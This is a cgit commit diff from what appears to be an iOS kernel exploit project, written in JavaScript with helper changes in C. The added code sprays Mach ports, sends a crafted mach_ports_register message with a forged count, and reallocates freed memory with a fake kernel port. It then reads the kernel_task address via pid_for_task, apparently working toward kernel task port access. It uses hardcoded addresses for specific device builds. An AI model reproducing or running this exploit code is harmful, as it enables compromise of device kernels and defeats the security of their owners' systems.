summaryrefslogtreecommitdiff
path: root/src
diff options
context:
space:
mode:
Diffstat (limited to 'src')
-rw-r--r--src/gen/main.c4
-rwxr-xr-xsrc/js/kexp/exploit.js141
-rwxr-xr-xsrc/js/lib/myutils.js5
-rw-r--r--src/js/primitives/call.js6
-rw-r--r--src/js/primitives/mem.js2
5 files changed, 152 insertions, 6 deletions
diff --git a/src/gen/main.c b/src/gen/main.c
index 0acc02b..4ee9e61 100644
--- a/src/gen/main.c
+++ b/src/gen/main.c
@@ -206,8 +206,8 @@ int main(int argc,
fprintf(stderr, "0x%x\n", RTLD_DEFAULT);
-// uint32_t stack_base = 0x1c7718; // my shell setup
- uint32_t stack_base = 0x1c7708; // my shell setup
+ uint32_t stack_base = 0x1c7718; // my shell setup
+// uint32_t stack_base = 0x1c7708; // my shell setup
// uint32_t stack_base = 0x1c7728; // my shell setup
// uint32_t stack_base = 0x1c77a8 ; // my 4s shell setup
// uint32_t stack_base = 0x1c2e48; // my lldb
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 715535d..8447c46 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -30,6 +30,16 @@ var req_init_port_set_address = 0x0;
var req_init_port_set_count = 0x4;
var MACH_RCV_MSG = 0x2;
var MACH_MSG_TIMEOUT_NONE = 0;
+var TASK_BSDINFO_OFFSET = 0x200;
+var BSDINFO_PID_OFFSET = 0x8;
+
+function find_kerneltask() {
+ return 0x8041200c;
+}
+
+function find_ipcspacekernel() {
+ return 0x80456664;
+}
var task_self = 0;
var kslide = 0;
@@ -58,7 +68,6 @@ var SIZEOF_BYTES_MSG = 384;
var PORTS_NUM = 1024;
var PORTS_NUM_PRESPRAY = 100;
var MIG_MAX = 0x1000;
-var NDR_record = 0x36ebf00c;
function spray_data(mem, size, num, portptr) {
var err = shit_heap(4);
@@ -272,6 +281,7 @@ function send_ports(target, payload, num, number_port_descs) {
}
function release_port_ptrs(port) {
+// var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
// printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
@@ -286,6 +296,37 @@ function r3gister(task, init_port_set, real_count, fake_count) {
var InP = mess;
var OutP = mess;
+ /*
+ InP->msgh_body.msgh_descriptor_count = 1;
+ InP->init_port_set.address = (void*)(init_port_set);
+ InP->init_port_set.count = real_count;
+ InP->init_port_set.disposition = 19;
+ InP->init_port_set.deallocate = FALSE;
+ InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ InP->NDR = NDR_record;
+ InP->init_port_setCnt = fake_count; // was real_count
+ InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP->Head.msgh_remote_port = task;
+ InP->Head.msgh_local_port = mig_get_local_port();
+ InP->Head.msgh_id = 3403;
+ InP->msgh_body.msgh_descriptor_count 0x18 0x4
+ InP->init_port_set.address 0x1c 0x4
+ InP->init_port_set.count 0x20 0x4
+ InP->init_port_set 0x1c
+ InP->NDR 0x28 0x8
+ InP->init_port_setCnt 0x30 0x4
+ InP->Head.msgh_bits 0x0 0x4
+ InP->Head.msgh_remote_port 0x8 0x4
+ InP->Head.msgh_local_port 0xc 0x4
+ InP->Head.msgh_id 0x14 0x4
+0x00000003
+0x00000034 0x0000002c
+0x00000024
+50
+78
+0x0 0x1057ec
+ */
+
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
@@ -305,10 +346,46 @@ function r3gister(task, init_port_set, real_count, fake_count) {
return ret;
}
+function mach_ports_lookup_shit() {
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+// var mts = mach_task_self();
+ printf("fuck\n");
+ calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ printf("mpl success\n");
+
+ return read_u32(read_u32(arrz) + 8);
+}
+
+var kernel_task_addr = 0;
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
+ /*
+ printf("fuck\n");
+ var arrz = shit_heap(4);
+ printf("fuck\n");
+ write_u32(arrz, 0);
+ printf("fuck\n");
+ var sz = shit_heap(4);;
+ printf("fuck\n");
+ write_u32(sz, 3);
+ printf("fuck\n");
+ var mts = mach_task_self();
+ printf("fuck\n");
+ mach_ports_lookup(mts, arrz, sz);
+ printf("mpl success\n");
+ return;
+*/
+
sanity_port = shit_heap(4);
task_self = mach_task_self();
@@ -351,6 +428,8 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+again: while (true) {
+
var dummy = shit_heap(4);
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
spray(big_buf, big_size, dummy);
@@ -374,13 +453,69 @@ function get_kernel_task() {
var arrmpt = shit_heap(8);
write_u32(arrmpt, 0);
write_u32(arrmpt + 4, 0);
+ mach_ports_lookup_shit();
var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
- printf("%d %s", ret__, mach_error_string(ret__));
+ mach_ports_lookup_shit();
+ printf("%d %s\n", ret__, mach_error_string(ret__));
printf("r3gister done\n");
+// while (true) {
+ //
+// }
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+ printf("fuck\n");
+// var fake_port = read_u32(read_u32(arrz) + 8);
+
+ /*
+ * BEGIN JANK FUCKING HACK
+ */
+ var fake_port = mach_ports_lookup_shit();
+ printf("fuck\n");
+ printf("%x\n", fake_port);
+ printf("fuck\n");
+ // todo: add mach_port_valid stuff
+ printf("fuck\n");
+
+ printf("fuck\n");
+ write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ printf("fuck\n");
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ printf("fuck\n");
+ var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
+ printf("fuck\n");
+ var tst = _sptr(tst_str);
+ printf("fuck\n");
+ var kpbuf = tst + 4;
+ printf("fuck\n");
-
+ printf("fuck\n");
+ for (var i = 0; i < 2; i++) {
+ printf("fuck\n");
+ write_buf(kpbuf + (i * 0x78), read_buf(kport + (i * 0x78), 0x78), 0x78);
+ }
+ printf("fuck\n");
+ usleep(10000);
+ sched_yield();
+ mach_port_destroy(mach_task_self(), read_u32(fakeportData));
+ spray_data(tst, tst_str.length, 10, fakeportData);
+ printf("fuck\n");
+ printf("done realloc");
+ printf("fuck\n");
+
+ printf("fuck\n");
+ var kernel_task_addr = shit_heap(4);
+ printf("fuck\n");
+ scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ ret__ = pid_for_task(fake_port, kernel_task_addr);
+ printf("%d %s\n", ret__, mach_error_string(ret__));
+ printf("fuck\n");
+ printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
+ printf("fuck\n");
+ call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+ printf("fuck\n");
printf("get lucky\n");
return tfp0;
+ }
}
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 71777f9..4424541 100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -122,4 +122,7 @@ var dlsym = scall_wrapper("dlsym");
var CFDictionaryCreateMutable = scall_wrapper("CFDictionaryCreateMutable");
var CFDictionarySetValue = scall_wrapper("CFDictionarySetValue");
var CFNumberCreate = scall_wrapper("CFNumberCreate");
-var mig_get_reply_port = scall_wrapper("mig_get_reply_port"); \ No newline at end of file
+var mig_get_reply_port = scall_wrapper("mig_get_reply_port");
+var mach_ports_lookup = scall_wrapper("mach_ports_lookup");
+var mach_port_destroy = scall_wrapper("mach_port_destroy");
+var pid_for_task = scall_wrapper("pid_for_task"); \ No newline at end of file
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index dfd3077..760ca40 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -11,6 +11,7 @@ if (build_for == N94AP_13G37) {
var pthread_exit = 0x20633048 | 1;
var pthread_join = 0x20636af4 | 1;
var add_sp_0x3c = 0x23d72b5a | 1;
+ var NDR_record = 0x36ebf00c;
} else if (build_for == N78AP_13G36) {
var __stack_chk_fail_lazy_addy = 0x347f7c48;
var __stack_chk_fail_resolver = 0x23d751fc;
@@ -19,6 +20,7 @@ if (build_for == N94AP_13G37) {
var pthread_exit = 0x20633048 | 1;
var pthread_join = 0x20636af4 | 1;
var add_sp_0x3c = 0x23d72b5a | 1;
+ var NDR_record = 0x364d200c;
}
var reserve_addr = 0x1a0000;
var sym_cache = {};
@@ -410,8 +412,12 @@ function scall() {
// printf("%s\n", args_to_pass.toString());
if (args_to_pass.length > 5 || force_callnarg) {
+// if (sptr_len > 100)
+// call4arg(sym_cache["puts"], sptr("callnarg"), 0, 0, 0);
return callnarg.apply(this, args_to_pass);
} else {
+// if (sptr_len > 100)
+// call4arg(sym_cache["puts"], sptr("call4arg"), 0, 0, 0);
var count_to_me = 5 - arguments.length;
for (var i = 0; i < count_to_me; i++) {
args_to_pass.push(0);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index b5078eb..4025c2f 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -254,6 +254,7 @@ function _sptr(s) {
}
write_str(global_sptr_addy, s);
global_sptr_addy += s.length;
+ sptr_len += s.length;
return global_sptr_addy - s.length;
}
@@ -281,6 +282,7 @@ function shit_heap(v) {
}
// write_str(global_sptr_addy, s);
global_sptr_addy += v;
+ sptr_len += v;
return global_sptr_addy - v;
}
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 21:27:32 +0000